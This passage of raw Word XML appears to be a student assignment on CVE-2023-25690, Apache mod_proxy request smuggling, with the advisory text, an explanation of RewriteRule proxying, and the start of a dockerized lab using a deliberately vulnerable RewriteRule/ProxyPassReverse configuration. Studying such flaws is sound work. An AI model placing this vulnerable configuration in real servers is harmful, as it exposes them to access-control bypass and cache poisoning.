          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00745BF4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>5. Security Blogs and Websites: Many security-focused blogs, websites, and news outlets regularly publish articles and analysis on software vulnerabilities. These sources often provide insights into the risk impact, potential attack vectors, and recommended mitigation steps for specific vulnerabilities. Examples of reputable security blogs and websites include KrebsOnSecurity, SecurityWeek, and The Hacker News.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E44E32D" w14:textId="07904CDD" w:rsidR="00853F15" w:rsidRPr="00745BF4" w:rsidRDefault="00853F15" w:rsidP="00745BF4">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63B23FA4" w14:textId="1307770E" w:rsidR="009A0FA8" w:rsidRDefault="009A0FA8"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 xml:space="preserve">If Nessus provides a pointer in the vulnerability assessment scan report to look up </w:t>
      </w:r>
      <w:r w:rsidR="00E272E2" w:rsidRPr="00D020D3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2023-25690 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D020D3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>when using the CVE search listing, specify what this CVE is, what the potential exploits are, and assess the severity of the vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4059E6F9" w14:textId="2176651B" w:rsidR="002600CB" w:rsidRDefault="002600CB" w:rsidP="002600CB">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A43FC7C" w14:textId="566A0A92" w:rsidR="00343A4D" w:rsidRDefault="00343A4D" w:rsidP="002600CB">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00343A4D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE-2023-25690 Detail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A94A3D" w14:textId="77777777" w:rsidR="00343A4D" w:rsidRPr="00343A4D" w:rsidRDefault="00343A4D" w:rsidP="00343A4D">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00343A4D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Current Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399E37CC" w14:textId="5091D270" w:rsidR="00343A4D" w:rsidRDefault="00343A4D" w:rsidP="00343A4D">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00343A4D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Some mod_proxy configurations on Apache HTTP Server versions 2.4.0 through 2.4.55 allow a HTTP Request Smuggling attack. Configurations are affected when mod_proxy is enabled along </w:t>
      </w:r>
      <w:r w:rsidRPr="00343A4D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>with some form of RewriteRule or ProxyPassMatch in which a non-specific pattern matches some portion of the user-supplied request-target (URL) data and is then re-inserted into the proxied request-target using variable substitution. For example, something like: RewriteEngine on RewriteRule</w:t>
      </w:r>
      <w:r w:rsidRPr="00343A4D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00343A4D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>"^/here/(.*)" "http://example.com:8080/elsewhere?$1"; [P] ProxyPassReverse /here/ http://example.com:8080/ Request splitting/smuggling could result in bypass of access controls in the proxy server, proxying unintended URLs to existing origin servers, and cache poisoning. Users are recommended to update to at least version 2.4.56 of Apache HTTP Server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425042A3" w14:textId="4BA8874A" w:rsidR="00BC579C" w:rsidRDefault="00DA6742" w:rsidP="002600CB">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6742">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE 2023 25690 - Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE4F4F8" w14:textId="6EC24816" w:rsidR="00DA6742" w:rsidRDefault="00DA6742" w:rsidP="002600CB">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6742">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E547013" wp14:editId="50BEC3F7">
            <wp:extent cx="5943600" cy="1360170"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22850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06945" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1360170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="483B8117" w14:textId="77777777" w:rsidR="00DA6742" w:rsidRPr="00DA6742" w:rsidRDefault="00DA6742" w:rsidP="00DA6742">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6742">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Advisory Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD42274" w14:textId="77777777" w:rsidR="00DA6742" w:rsidRPr="00DA6742" w:rsidRDefault="00DA6742" w:rsidP="00DA6742">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6742">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Some mod_proxy configurations on Apache HTTP Server versions 2.4.0 through 2.4.55 allow a HTTP Request Smuggling attack. Configurations are affected when mod_proxy is enabled along with some form of RewriteRule or ProxyPassMatch in which a non-specific pattern matches some portion of the user-supplied request-target (URL) data and is then re-inserted into the proxied request-target using variable substitution. For example, something like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AF3DE6" w14:textId="77777777" w:rsidR="00FB444F" w:rsidRDefault="00FB444F" w:rsidP="00FB444F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>RewriteEngine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="78A960"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4093B42A" w14:textId="77777777" w:rsidR="00FB444F" w:rsidRDefault="00FB444F" w:rsidP="00FB444F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1F7199"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>RewriteRule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>"^/here/(.*)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>"http://example.com:8080/elsewhere?$1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1F7199"/>
        </w:rPr>
        <w:t xml:space="preserve"> [P]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D15750" w14:textId="424A89C2" w:rsidR="00DA6742" w:rsidRPr="00DA6742" w:rsidRDefault="00FB444F" w:rsidP="00FB444F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1F7199"/>
        </w:rPr>
        <w:t>ProxyPassReverse /here/ http://example.com:8080/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE72272" w14:textId="46DD919E" w:rsidR="00DC72D5" w:rsidRPr="00DC72D5" w:rsidRDefault="00DC72D5" w:rsidP="00DC72D5">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC72D5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>When a user requests the URL https://example-shop.com/categories/1, the RewriteRule will match the URL and capture the value 1 using the regular expression ^/categories/(.*). The rule then rewrites the URL to http://example-shop.com:8080/categories?id=1 by appending the captured value to the rewritten URL as a query parameter id.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F30092" w14:textId="1FE59DA5" w:rsidR="00DC72D5" w:rsidRPr="00DC72D5" w:rsidRDefault="00DC72D5" w:rsidP="00DC72D5">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC72D5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Since the [P] flag exists in the rule, Apache will treat the rewritten URL as a proxy request and forward it to the target server at http://example-shop.com:8080/categories with the query parameter id set to 1. The target server will then process the request and send the response back to Apache, which will forward it to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4FAE9B" w14:textId="27FC94CF" w:rsidR="00DC72D5" w:rsidRPr="00DC72D5" w:rsidRDefault="00DC72D5" w:rsidP="00DC72D5">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC72D5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>In summary, the RewriteRule directive with the [P] flag is used to rewrite URLs and proxy them to a different server. In this case, the rule matches URLs starting with /categories/ and appends the captured value as a query parameter id to the rewritten URL. Apache then forwards the request to the target server, which processes the request and returns the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D0AC32" w14:textId="77777777" w:rsidR="00DC72D5" w:rsidRDefault="00DC72D5" w:rsidP="00DC72D5">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC72D5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally regarding ProxyPassReverse /categories/ http://example-shop.com:8080/ this line simply replaces the backend server's domain and path with the proxy server's domain and path, so that </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC72D5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>the client is able to correctly follow links and access content from the proxied backend server as if it were being served directly from the proxy server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBC4A69" w14:textId="3D282999" w:rsidR="00FB444F" w:rsidRDefault="00FB444F" w:rsidP="00DC72D5">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB444F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Data Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61803B6C" w14:textId="056BF305" w:rsidR="00FB444F" w:rsidRDefault="00FB444F" w:rsidP="00FB444F">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB444F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1956A8FD" wp14:editId="30D43CB1">
            <wp:extent cx="5943600" cy="2312035"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="161763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9149" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2312035"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="119D99D8" w14:textId="0CCDA946" w:rsidR="00DD3D48" w:rsidRPr="00DD3D48" w:rsidRDefault="00DD3D48" w:rsidP="00FB444F">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD3D48">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24182E95" w14:textId="31C4BC56" w:rsidR="00CC4AAA" w:rsidRPr="00CC4AAA" w:rsidRDefault="00CC4AAA" w:rsidP="00CC4AAA">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC4AAA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>To simulate the vulnerabity in Apache we will use the httpd version 2.4.55. Additionally, the entire lab will be dockerized for improved ease of setup, configuration, and reproducibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E5C5E5" w14:textId="4EBFDE6C" w:rsidR="00FB444F" w:rsidRDefault="00CC4AAA" w:rsidP="00CC4AAA">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC4AAA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>The lab file structure will be the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F4B4E7" w14:textId="77777777" w:rsidR="00CC4AAA" w:rsidRDefault="00CC4AAA">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>lab/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t>├── backend</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t>│   ├── Dockerfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t>│   └── src</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t>│       ├── categories</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t>│       └── index</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t>├── docker-compose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t>└── frontend</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    ├── Dockerfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    └── httpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5F4070" w14:textId="6DDD265C" w:rsidR="00CC4AAA" w:rsidRDefault="00CC4AAA" w:rsidP="00CC4AAA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC4AAA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>The final httpd.conf configuration is structed like below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C604B9" w14:textId="77777777" w:rsidR="003C1139" w:rsidRDefault="003C1139">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>ErrorLog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>"/usr/local/apache2/logs/error.log"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>CustomLog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>"/usr/local/apache2/logs/access.log"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> common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Load necessary modules </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>LoadModule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> rewrite_module modules/mod_rewrite.so</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
